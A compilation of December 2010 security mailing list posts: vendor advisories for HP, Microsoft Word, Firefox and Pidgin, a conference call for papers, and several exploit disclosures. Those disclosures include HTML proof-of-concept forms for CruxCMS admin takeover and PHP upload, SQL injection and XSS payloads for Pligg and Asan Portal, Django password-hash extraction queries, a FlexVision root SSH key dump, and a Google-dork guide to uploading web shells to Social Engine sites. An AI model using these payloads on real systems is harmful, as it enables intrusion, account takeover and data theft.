Sigma Portal Denial of Service Vulnerability
# # Securitylab.ir # # Application Info: # Name: Sigma Portal # Vendor: http://www.sigma.ir # # Vulnerability Info: # Type: Denial of Service # Risk: Medium # 2010-08-11 - Vendor notified # Vulnerability: http://site.ir/Portal/Picture/ShowObjectPicture.aspx?Width=%2791Height=1099000-=ObjectType=NewsObjectID=(Picture ID) With setting of large values of width and height it's possible to create large load at the server. # # Discoverd By: Pouya Daneshmand # Website: http://Securitylab.ir # Contacts: info[at]securitylab.ir whh_iran[at]yahoo.com ###
[security bulletin] HPSBST02619 SSRT100281 rev.2 - HP StorageWorks Storage Mirroring, Remote Execution of Arbitrary Code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02660122 Version: 2 HPSBST02619 SSRT100281 rev.2 - HP StorageWorks Storage Mirroring, Remote Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2010-12-20 Last Updated: 2010-12-22 Potential Security Impact: Remote execution of arbitrary code Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP StorageWorks Storage Mirroring. This vulnerability could be exploited remotely to execute arbitrary code. References: CVE-2010-4116, ZDI-CAN-958 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP StorageWorks Storage Mirroring v5 prior to v5.2.2.1771.2 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2010-4116(AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks Abdul Aziz Hariri of ThirdEyeTesters along with TippingPoint's Zero Day Initiative for reporting this vulnerability to security-al...@hp.com. RESOLUTION HP has provided HP StorageWorks Storage Mirroring v5.2.2.1771.2 to resolve the vulnerability. Customers can receive HP StorageWorks Storage Mirroring v5.2.2.1771.2 or subsequent by contacting the normal HP Services support channel. HISTORY Version:1 (rev.1) - 20 December 2010 Initial release Version:2 (rev.2) - 20 December 2010 Added TippingPoint to the acknowledgement in the Background section Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-al...@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement. Copyright 2009 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is
Secunia Research: Microsoft Word LFO Parsing Double-Free Vulnerability
== Secunia Research 23/12/2010 - Microsoft Word LFO Parsing Double-Free Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Microsoft Word 2002 (10.6856.6858) SP3 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: From remote == 3) Vendor's Description of Software Office Word ... provides editing and reviewing tools that help you create professional documents more easily than ever before. Product Link: http://office.microsoft.com/en-us/word/default.aspx == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Word, which can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused by a double-free error when processing LFO (List Format Override) records and can be exploited to corrupt memory via a specially crafted Word document. Successful exploitation may allow execution of arbitrary code. == 5) Solution Apply patches provided by MS10-079. == 6) Time Table 25/05/2010 - Vendor notified. 25/05/2010 - Vendor response. 22/12/2010 - Vendor informs that due to a mishap the vulnerability report fell off their radar. The vulnerability has in the meantime been fixed by MS10-079, which will be updated accordingly with proper credits. 23/12/2010 - Public disclosure. == 7) Credits Discovered by Alin Rad Pop, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3217 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-76/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Asan Portal (IdehPardaz) Multiple Vulnerabilities
# # Securitylab.ir # # Application Info: # Name: Asan Portal # Vendor: http://iptech.ir/default.aspx?id=130 # Vulnerability: ## # Denial of Service: ## http://site.ir/Modules/Administrative/ShowPhotos/ShowImages.aspx?id=922FieldName=Content_Image1w=1000h=1000 With setting of large values of width and height it's possible to create large load at the server. ## # SQL Injection: ## http://site.ir//Modules/Administrative/ShowPhotos/ShowImages.aspx?FieldName=Content_Image1h=75id=%24[SQL Injection]w=75 # # Discoverd By: Securitylab.ir # Website: http://Securitylab.ir # Contacts: info[at]securitylab.ir ###
[waraxe-2010-SA#078] - Multiple Vulnerabilities in CruxCMS 3.0.0
[waraxe-2010-SA#078] - Multiple Vulnerabilities in CruxCMS 3.0.0
===
Author: Janek Vind waraxe
Date: 27. December 2010
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-78.html
Affected Software:
~~~
CruxCMS is a lightweight, easy to use website content management system (CMS).
It is written in PHP and uses the powerful MySQL database.
http://www.cruxsoftware.co.uk/cruxcms.php
Affected versions
~~~
Tests were conducted against CruxCMS version 3.0.0
###
1. Unauthorized password reset in manager/passwordreset.php
###
Reason: directly accessible php script
Attack vectors: user submitted POST parameters ID and Password
Preconditions: none
Impact: attacker can take over CruxCMS admin account
Php script manager/passwordreset.php is directly accessible via web
without any authorization. Source code snippet:
-[ source code start ]-
include (../includes/injectionprevention.php);
$ID = numericquery($_POST[ID]) ;
if (isset($ID)) {
$Password = preventinjection($_POST[Password]);
$Password2 = md5($Password);
//Connect to database
include (../includes/dbinfo.php);
// Insert data
$sqlquery = UPDATE . usersdb . SET
.Password =' .$Password2 .' WHERE ID =' .$ID .';
$results = mysql_query($sqlquery);
-[ source code end ]---
Example exploit:
---
html
headtitleCruxCMS 3.0.0 Unauthorized Password Reset PoC by
waraxe/title/head
bodycenter
form action=http://localhost/cruxcms.3.0.0/manager/passwordreset.php;
method=post
input type=hidden name=ID value=1
input type=hidden name=Password value=waraxe
input type=submit value=Test!
/form
/center/body/html
---
###
2. Arbitrary file upload in manager/processeditor.php
###
Reason: directly accessible php script
Attack vector: specially crafted POST request
Preconditions: none
Impact: attacker is able to write remote php files to any location.
Php script manager/processeditor.php is directly accessible via web
without any authorization. Source code snippet:
-[ source code start ]-
$Name = preventinjection($_POST[name]) ;
if (isset($_POST['Type'])) {
$Type = $_POST['Type'];
}
..
$head = $_POST[head] ;
$headlink = $Name . .php;
if ($Type == Add) {
..
$fileopen = fopen($headlink, 'w') or die(can't open file);
fwrite($fileopen, $head);
fclose($fileopen);
-[ source code end ]---
Example exploit:
---
html
headtitleCruxCMS 3.0.0 processeditor.php File Upload PoC by
waraxe/title/head
bodycenter
form action=http://localhost/cruxcms.3.0.0/manager/processeditor.php;
method=post
input type=hidden name=Type value=Add
input type=hidden name=name value=../images/info
input type=hidden name=head value=?phpinfo();?
input type=submit value=Test!
/form
/center/body/html
---
For testing first make sure, that images directory is writable by php.
Open html file above and click Test! button. After successful POST request
newly written remote file can be accessed like this:
http://localhost/cruxcms.3.0.0/images/info.php
###
3. Arbitrary file upload in manager/processfile.php
###
Reason: directly accessible php script
Attack vector: specially crafted POST request
Preconditions: none
Example exploit:
---
html
headtitleCruxCMS 3.0.0 processfile.php File Upload PoC by
waraxe/title/head
bodycenter
form action=http://localhost/cruxcms.3.0.0/manager/processfile.php;
enctype=multipart/form-data method=postmethod=post
input type=hidden name=Action value=Add
input type=file name=uploadedfile size=40
input type=submit value=Test!
/form
/center/body/html
---
For testing first make sure, that Uploads/Misc/ directory is writable by php.
Open html file above and click Test! button. After successful POST request
newly written remote file can be accessed like this:
[ MDVSA-2010:251-2 ] firefox
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:251-2 http://www.mandriva.com/security/ ___ Package : firefox Date: December 24, 2010 Affected: 2010.0 ___ Problem Description: Security issues were identified and fixed in firefox: Security researchers Yosuke Hasegawa and Masatoshi Kimura reported that the x-mac-arabic, x-mac-farsi and x-mac-hebrew character encodings are vulnerable to XSS attacks due to some characters being converted to angle brackets when displayed by the rendering engine. Sites using these character encodings would thus be potentially vulnerable to script injection attacks if their script filtering code fails to strip out these specific characters (CVE-2010-3770). Google security researcher Michal Zalewski reported that when a window was opened to a site resulting in a network or certificate error page, the opening site could access the document inside the opened window and inject arbitrary content. An attacker could use this bug to spoof the location bar and trick a user into thinking they were on a different site than they actually were (CVE-2010-3774). Mozilla security researcher moz_bug_r_a4 reported that the fix for CVE-2010-0179 could be circumvented permitting the execution of arbitrary JavaScript with chrome privileges (CVE-2010-3773). Security researcher regenrecht reported via TippingPoint's Zero Day Initiative that JavaScript arrays were vulnerable to an integer overflow vulnerability. The report demonstrated that an array could be constructed containing a very large number of items such that when memory was allocated to store the array items, the integer value used to calculate the buffer size would overflow resulting in too small a buffer being allocated. Subsequent use of the array object could then result in data being written past the end of the buffer and causing memory corruption (CVE-2010-3767). Security researcher regenrecht reported via TippingPoint's Zero Day Initiative that a nsDOMAttribute node can be modified without informing the iterator object responsible for various DOM traversals. This flaw could lead to a inconsistent state where the iterator points to an object it believes is part of the DOM but actually points to some other object. If such an object had been deleted and its memory reclaimed by the system, then the iterator could be used to call into attacker-controlled memory (CVE-2010-3766). Security researcher Gregory Fleischer reported that when a Java LiveConnect script was loaded via a data: URL which redirects via a meta refresh, then the resulting plugin object was created with the wrong security principal and thus received elevated privileges such as the abilities to read local files, launch processes, and create network connections (CVE-2010-3775). Mozilla added the OTS font sanitizing library to prevent downloadable fonts from exposing vulnerabilities in the underlying OS font code. This library mitigates against several issues independently reported by Red Hat Security Response Team member Marc Schoenefeld and Mozilla security researcher Christoph Diehl (CVE-2010-3768). Security researcher wushi of team509 reported that when a XUL tree had an HTML \div\ element nested inside a \treechildren\ element then code attempting to display content in the XUL tree would incorrectly treat the \div\ element as a parent node to tree content underneath it resulting in incorrect indexes being calculated for the child content. These incorrect indexes were used in subsequent array operations which resulted in writing data past the end of an allocated buffer. An attacker could use this issue to crash a victim's browser and run arbitrary code on their machine (CVE-2010-3772). Security researcher echo reported that a web page could open a window with an about:blank location and then inject an \isindex\ element into that page which upon submission would redirect to a chrome: document. The effect of this defect was that the original page would wind up with a reference to a chrome-privileged object, the opened window, which could be leveraged for privilege escalation attacks (CVE-2010-3771). Dirk Heinrich reported that on Windows platforms when document.write() was called with a very long string a buffer overflow was caused in line breaking routines attempting to process the string for display. Such cases triggered an invalid read past the end of an array causing a crash which an attacker could potentially use to run arbitrary code on a victim's computer (CVE-2010-3769). Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other
Django admin list filter data extraction / leakage
ADVISORY INFORMATION: Advisory ID: NGENUITY-2010-009 Date discovered: 8.28.2010 Date published: 12.22.2010 SOFTWARE AFFECTED: “Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.” [1] The admin interface of the Django web framework can be abused to extract information, such as user password hashes via list filters. Version 1.1.2, 1.2.3 and before are affected. The advisory from the Django dev team can be found here [2]. TECHNICAL DETAILS: The principle behind the vulnerability is similar to blind sql injection, but abuses a feature of t We can use list filters to follow foreign keys into models and data our user should not normally have access to. Using regular expressions gives us a lot of flexibility to work our way down the value we want to extract. For a model that has a created_by field that points to a User object we could extract the password hash using a request similar to the below. http://example.com/admin/testapp/testmodel/?created_by__password__regex=^sha1\$[0-9]$ http://example.com/admin/testapp/testmodel/?created_by__password__regex=^sha1\$[a-f]$ Authentication as a staff user in the admin is required to exploit this vulnerability. Here's looking at you CMS apps! CREDIT: This vulnerability was discovered by Adam Baldwin mailto:adam_bald...@ngenuity-is.commailto:adam_bald...@ngenuity-is.com REFERENCES: [1] - http://www.djangoproject.com [2] - http://www.djangoproject.com/weblog/2010/dec/22/security/ [3] - http://ngenuity-is.com/advisories/2010/dec/22/information-leakage-in-django-administrative-inter/ [4] - http://evilpacket.net/2010/dec/22/information-leakage-django-administrative-interfac/
[ MDVSA-2010:259 ] pidgin
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:259 http://www.mandriva.com/security/ ___ Package : pidgin Date: December 23, 2010 Affected: 2009.0, 2010.0, 2010.1 ___ Problem Description: A null pointer dereference due to receiving a short packet for a direct connection in the MSN code could potentially cause a denial of service. Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149products_id=490 This update provides pidgin 2.7.8 that has been patched to address this flaw. ___ References: http://pidgin.im/news/security/ ___ Updated Packages: Mandriva Linux 2009.0: c268cfea5df24d94a1fce4ed9e9c8e2b 2009.0/i586/finch-2.7.8-0.2mdv2009.0.i586.rpm 1b83a79a24630273cb0fd6de36063d01 2009.0/i586/libfinch0-2.7.8-0.2mdv2009.0.i586.rpm 5ac73ba5e6b8f422fdd2dc8216112072 2009.0/i586/libpurple0-2.7.8-0.2mdv2009.0.i586.rpm 297f0cdd8b87c5cd4909c3c6fbe1ac31 2009.0/i586/libpurple-devel-2.7.8-0.2mdv2009.0.i586.rpm e57619f18b1e859ee22631c2f393be6b 2009.0/i586/pidgin-2.7.8-0.2mdv2009.0.i586.rpm 0b317674aa0aa78c7b2601ebd66ef886 2009.0/i586/pidgin-bonjour-2.7.8-0.2mdv2009.0.i586.rpm e2e068ed1acc961c256fb5fb3a6bc4a7 2009.0/i586/pidgin-client-2.7.8-0.2mdv2009.0.i586.rpm 409b5693a3d350d54a6b1b07dcfe4e88 2009.0/i586/pidgin-gevolution-2.7.8-0.2mdv2009.0.i586.rpm 64d503c98a0048ecae1f6959e1902c7b 2009.0/i586/pidgin-i18n-2.7.8-0.2mdv2009.0.i586.rpm 2fd2ea0ba84497c5dd778b8a4996a446 2009.0/i586/pidgin-meanwhile-2.7.8-0.2mdv2009.0.i586.rpm 195a0fca668c2cb8b049aa2f878d6b99 2009.0/i586/pidgin-perl-2.7.8-0.2mdv2009.0.i586.rpm eab1d0f42237cb2de2bf0dcdb60c01f5 2009.0/i586/pidgin-plugins-2.7.8-0.2mdv2009.0.i586.rpm df33bb5b86bd903aa82e31b3ae2c7405 2009.0/i586/pidgin-silc-2.7.8-0.2mdv2009.0.i586.rpm 356ff080f65bc0e6dbff9f3292ab35ed 2009.0/i586/pidgin-tcl-2.7.8-0.2mdv2009.0.i586.rpm 6fe3a267b0c994c98252defc0229d73f 2009.0/SRPMS/pidgin-2.7.8-0.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 07cbd9d2d40cb069ea315cb55dc1d5b9 2009.0/x86_64/finch-2.7.8-0.2mdv2009.0.x86_64.rpm 2759f7a76653f15d33e23828041e775d 2009.0/x86_64/lib64finch0-2.7.8-0.2mdv2009.0.x86_64.rpm f120e2602535fdd5736a3f0051d97648 2009.0/x86_64/lib64purple0-2.7.8-0.2mdv2009.0.x86_64.rpm c477958fdb03426af9cd29a7da91373d 2009.0/x86_64/lib64purple-devel-2.7.8-0.2mdv2009.0.x86_64.rpm e7d575b135dc40ffe447e85958e89f0f 2009.0/x86_64/pidgin-2.7.8-0.2mdv2009.0.x86_64.rpm 0ba47012d00f1682c00fd9b87072129e 2009.0/x86_64/pidgin-bonjour-2.7.8-0.2mdv2009.0.x86_64.rpm 55eeaf467e82d003abf5de61b65f5ae0 2009.0/x86_64/pidgin-client-2.7.8-0.2mdv2009.0.x86_64.rpm 4478c7c5301da7fcb78c989eb18d9497 2009.0/x86_64/pidgin-gevolution-2.7.8-0.2mdv2009.0.x86_64.rpm 448777d63afc82270d18b2a99fa5294a 2009.0/x86_64/pidgin-i18n-2.7.8-0.2mdv2009.0.x86_64.rpm 51080c450cb241977de0a5c94564c368 2009.0/x86_64/pidgin-meanwhile-2.7.8-0.2mdv2009.0.x86_64.rpm 7e8cb3ebcd3b71134ee00761766d6407 2009.0/x86_64/pidgin-perl-2.7.8-0.2mdv2009.0.x86_64.rpm 2f06b7d807934fdb4a3ada32e7e1dcc7 2009.0/x86_64/pidgin-plugins-2.7.8-0.2mdv2009.0.x86_64.rpm 123067587dab1f25871be80313bba3c5 2009.0/x86_64/pidgin-silc-2.7.8-0.2mdv2009.0.x86_64.rpm d7d55cb2e4ca769ea94a3a44690bc7d1 2009.0/x86_64/pidgin-tcl-2.7.8-0.2mdv2009.0.x86_64.rpm 6fe3a267b0c994c98252defc0229d73f 2009.0/SRPMS/pidgin-2.7.8-0.2mdv2009.0.src.rpm Mandriva Linux 2010.0: 9c7d51a088df133d4caa4b8059ba821a 2010.0/i586/finch-2.7.8-0.2mdv2010.0.i586.rpm 8dedd9ee7739e0ed384df88f63501412 2010.0/i586/libfinch0-2.7.8-0.2mdv2010.0.i586.rpm f67e74064a653bb9a2812eb78a307cff 2010.0/i586/libpurple0-2.7.8-0.2mdv2010.0.i586.rpm 3483a4e99e028e5b09ea0165b176c037 2010.0/i586/libpurple-devel-2.7.8-0.2mdv2010.0.i586.rpm 5117c80ad19c56b39280f7c3dfdd1872 2010.0/i586/pidgin-2.7.8-0.2mdv2010.0.i586.rpm dc33975bc058eb24168e029967889c5b 2010.0/i586/pidgin-bonjour-2.7.8-0.2mdv2010.0.i586.rpm b9104754d162f03f083da877997c9150 2010.0/i586/pidgin-client-2.7.8-0.2mdv2010.0.i586.rpm 1013da7e359b8cc576ebea1aebbfcce6 2010.0/i586/pidgin-i18n-2.7.8-0.2mdv2010.0.i586.rpm a686ada4efeea86b8bff3b1a861084f3 2010.0/i586/pidgin-meanwhile-2.7.8-0.2mdv2010.0.i586.rpm 361dc60eeeabf18fe147aa636c94c04f 2010.0/i586/pidgin-perl-2.7.8-0.2mdv2010.0.i586.rpm a001335057f3aebd6733378469d58871 2010.0/i586/pidgin-plugins-2.7.8-0.2mdv2010.0.i586.rpm 0cdc172b5dc0b62f0468c4ed00a4141d 2010.0/i586/pidgin-silc-2.7.8-0.2mdv2010.0.i586.rpm 6d09b87891d3b38b4b7a70a6a69261d2
Re: [IMF 2011] 2nd Call - Deadline Extended - Addenunm
Addenum: Merry Christmas to everyone! Ollie -- Oliver Goebelmailto:goe...@cert.uni-stuttgart.de Stabsstelle DV-Sicherheit (RUS-CERT) Tel:+49 711 685 1 CERT Universitaet Stuttgart Tel:+49 711 685 8-3678 / Fax:-3688 Breitscheidstr. 2, 70174 Stuttgart http://CERT.Uni-Stuttgart.DE/
Pligg XSS and SQL Injection
Credit: Michael Brooks Bug Fix in 1.1.2: http://www.pligg.com/blog/1174/pligg-cms-1-1-2-release/ Special thanks to Eric Heikkinen for patching these quickly. Blind SQL Injection http://host/pligg_1.1.2/search.php?adv=1status= 'and+sleep(9)or+sleep(9)or+1%3D' search=onadvancesearch= Search +sgroup=onstags=0slink=onscategory=onscomments=0suser=0 XSS: http://host/pligg_1.1.2/?xss='onmouseover=alert(1);// http://host/pligg_1.1.2/?search=; onclick=alert(1) a= The onclick event can be used as reflective xss on /register.php using the following post variables: reg_username reg_email reg_password reg_password2
[IMF 2011] 2nd Call - Deadline Extended
Dear all, the deadline for the submission of papers to IMF 2011 has been extended. Accepted papers will be published in IEEE Computer Society's Conference Proceedings Series and be available in the IEEE online Digital Library. Please excuse possible cross-postings. CALL FOR PAPERS IMF 2011 6th International Conference on IT Security Incident Management IT Forensics May 10th - 12th, 2011 Stuttgart, Germany DEADLINE EXTENSION! PAPER SUBMISSION The deadline for paper submissions has been extended to January 17th, 2011. Notification of acceptance will be sent on January 31st. Camera ready paper copies must be submitted until Febuary 7th, 2011. Papers can be submitted via the page found at: http://www.imf-conference.org/imf2011/submission.html Accepted papers will be published in IEEE Computer Society's Conference Proceedings Series and be available in the IEEE online Digital Library. Conference Background - IT-Security has become a steady concern for all entities operating IT-Systems. These include enterprises, governmental and non-governmental organizations, as well as individuals. Yet, despite high-end precautionary measures taken, not every attack or security mishap can be prevented and hence incidents will go on happening. In such cases forensic capabilities in investigating incidents in both technical and legal aspects are vital to understand their issue and feed back the knowledge gained into the security process. Documenting the measures taken to prevent or minimize damage to own or external IT infrastructure provides legal rear cover if an involved party decides to start proceedings. In a possible lawsuit emerging from such an incident, its treatment in a forensically proper way is crucial to be able to possibly claim for damages or prevent from being threatened by claims of third parties. Thus, capable incident response and forensic procedures have become an essential part of IT infrastructure operations. In law enforcement IT forensics is an important branch and its significance constantly increases since IT has become an essential part in almost every aspect of daily life. IT systems produce traces and evidence in many ways that play a more and more relevant role in resolving cases. Conference Goals IMF's intent is to gather experts from throughout the world in order to present and discuss recent technical and methodical advances in the fields of IT security incident response and management and IT forensics. The conference provides a platform for collaboration and exchange of ideas between industry (both as users and solution providers), academia, law-enforcement and other government bodies. Conference Topics -- The scope of IMF 2011 is broad and includes, but is not limited to the following areas: IT Security Incident Response - Procedures and Methods of Incident Response - Formats and Standardization for Incident Response - Tools Supporting Incident Response - Incident Analysis - CERTs/CSIRTs - Sources of Information, Information Exchange, Communities - Dealing with Vulnerabilities (Vulnerability Response) - Monitoring and Early Warning - Education and Training - Organizations - Legal and Enterprise Aspects (Jurisdiction, Applicable Laws and Regulations) IT Forensics - Trends and Challenges in IT Forensics - Application of forensic techniques in new areas - Techniques, Tools in Procedures IT Forensics -Methods for the Gathering, Handling, Processing and Analysis of Digital Evidence - Evidence Protection in IT Environments - Standardization in IT Forensics - Education and Training - Organizations - Legal and Enterprise Aspects (Jurisdiction, Applicable Laws and Regulations) Submission Details -- IMF invites to submit full papers, presenting novel and mature research results as well as practice papers, describing best practices, case studies or lessons learned of up to 20 pages. Proposals for workshops, discussions and presentations on practical methods and challenges are also welcome. All submissions must be written in English (see below), and either in postscript or PDF format. Authors of accepted papers must ensure that their papers will be presented at the conference. Submitted full papers must not substantially overlap papers that have been published elsewhere or that are simultaneously submitted to a journal or a conference with proceedings. All submissions will be reviewed by the program committee and papers accepted to be presented at the conference will be included in the conference proceedings. Details on the electronic submission procedure as well
Security Advisory - FlexVision Listener Vulnerability
=[ Tempest Security Intelligence - Advisory #02 / 2010 ]= Information Disclosure Vulnerability in FlexVision Agent Listener - Authors: Victor Ribeiro Hora victor *SPAM* tempest.com.br http://tempest.com.br Tempest Security Intelligence - Brazil =[ Table of Contents ]= 1. Overview 2. Detailed description 3. Additional context Solutions 4. References 5. Thanks =[ Overview ]== * System affected: FlexVision Agent Listener 1.3 for Windows, Linux and Solaris (other versions may be vulnerable) * Release date: 22 October 2010 * Impact: Successful exploitation of this vulnerability may lead to remote server sensitive information disclosure. FlexVision [1] claims to be an IT service focused on hardware and software management, offering features like capacity planning, SLA monitoring and systems inventory. The service is used by several major companies in Brazil, including banking, telecom, energy, health and independent product sectors. The vulnerability was found in the inventory agent listener or fval. Exploitation of this weakness does not require any authentication and may lead to remote disclosure of sensitive information from the server running the agent. Specifically, an attacker can download non-binary files, and list running services, running processes and installed software. It seems there is some active filtering for known sensitive data, but other sensitive information may leak. =[ Detailed description ] FlexVision Inventory service has several agents (servers) to collect data from different platforms and send them to a central console on the network. These agents are installed on the hardware to be monitored and listen for incoming client connections. One of the agents that was analyzed is the FlexVision Actions Listener 1.3 for Linux, used for the inventory of Linux systems. This agent is executed by a Linux binary called fval started at boot time through an initscript in /etc/init.d/rc.fval. Apparently the fval binary executes a chdir() to /opt/flex/plugins, then it opens a socket listening for connections on port 3810/TCP in daemon mode. As soon as the TCP Three-Way Handshake is completed, the agent keeps waiting for commands to perform the various inventory functions. These commands are interpreted as internal functions of the fval binary, such as help, version, exit or run. Specifically, the run function expects a parameter. We noted that this parameter is a bash script file in the /opt/flex/plugins directory. This script is executed by the fval binary, and the output of the script is returned on the same TCP connection to the central console application. These commands are normally sent from a central console to the monitored agent. As the connection is not authenticated nor encrypted in any way, it gives the possibility of any computer that has access to the 3810/TCP port of any agent, sending commands to be executed by the agent. In spite of the fact that the agent uses an active filter for some well known sensitive data (like password hashes in the shadow file, for example), it is possible to get other not easily predictable but sensitive data. Some special chars we tested were also filtered, such as '*', ';', '' , and also white spaces, tabs and other special delimiters used on bash and other shells. The following is an example of the recovery of a private SSH RSA key file that belongs to the root user on a Linux server: --- v...@victim01:~$ telnet 192.168.1.1 3810 Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. FVALrun symonfile.sh /root/.ssh id_rsa -BEGIN RSA PRIVATE KEY- MIIEogIBAAKCAQEA3wKpWZ0xgmIWX4JVb72wt5STGdhr2x0whvY25hhNfI9zpNIG eV0zRXy4hbVqRvcJVu3+Ho6ZyXIg8bVzljFJdx/anBs5KLrlvfoMDrgwNWtp8Slz Fuhfp7ej0wr57ZRyKq4imz3vvle24SRtROymSMDCtolbY4wZFCRu6JJ+3jAVqlxJ 9YMdVqL7BoF0Nbp+s7FqIdbpwwOtcS0PpprvWTbFcQ+z3ReN7B7SybZTkuZPD56o z1QtnzhgnVFHBD3TPXPorKf42uuDeW3twFKYlFOuSmz46tKCsbBoM8TBPNtYCvAe 3G7Aj0R/jvBdL9+hz/cG+riwL0NYTSe7uTO4kQIBIwKCAQATHXw64ZaHhMAW0Kg8 xx3Gl7TWVGEEJxLJvVUpqk/I2RiKeGb0dbPwA2BF+ZtlKx4Ow/E10bVpCchPO3BO s8R37MmYWhrXmv2/05qiLQtySwkUq8gJRx4kUZGzAPDZ2YYg6lq82WxSJMaIU5RW XW1WsW/GgM1RrOw07S4T70yz9VUvFo4M5m7GMP0AjffvJv8dhABNRPV1uzBGqjyV --- Just like Linux fval, on Windows it's also possible to dump any non-binary file. It's worth saying that as fval always runs as privileged user (Administrator/root), all the system files are accessible and most of them are readable. Windows hosts behave similary. As soon as the Agent is installed, it is registered as a System Service and runs at boot time. This service runs the fval binary
Re: XSS vulnerability in ImpressCMS
fixed with version 1.2.4
Social Engine 4.x (Music Plugin) Arbitrary File Upload Vulnerability
###
# Exploit Title: Social Engine 4.x (Music Plugin) Arbitrary File Upload
# Google Dork: inurl:user/auth/forgot
# Date: 22/12/2010
# Author: MyDoom ( Moroccan Hacker )
# Contact: mydoom2...@gmail.com
# Software Link: http://http://www.socialengine.net
# Version: Social Engine 4.x (should work on previous versions but no tested)
# Tested on: Windows 7 - Linux 3.6.33 2010 - Linux 3.6.18 2010 -
Windows Server 2003
# Greetz to : ALBoraaq Hackers ;) - Especially T3es
###
Vulnerable Javascript Source Code:
window.addEvent('domready', function() { // wait for the content
...snip...
// remove that line to select all files, or edit it,
add more items
typeFilter: {
'Music (*.mp3,*.m4a,*.aac,*.mp4)': '*.mp3;
*.m4a; *.aac; *.mp4'
},
Description:
The File filter used in the code don't check the uploaded file but
only set the type of files that can be veiwed in the upload window
so if we type *.*in the filename we will see all others file and
then we can upload any type of file.
Exploit:
[~] Step 1 : Find A social network using the Social Engine with MUSIC PLUGIN
[~] Step 2: Register A Fake Account
[~] Step 3: Click On Music Link in the menu or go to http://www..com/music
[~] Step 4: Click On Upload Music And Then Fill the Playlist info
[~] Step 5: Click On Add Music And Select The php file ( If you can
see php file in the upload window type *.* in the file name )
[~] Step 6: And Click on save music to playlist
[~] Step 7: You Will See the Music Player Move the Cursor on the php
filename and copy the link of the shell.
Generaly it will be :
http://www.xxx.com/public/music_song/100/[numbers]/[user_id]/[some_numbers].php
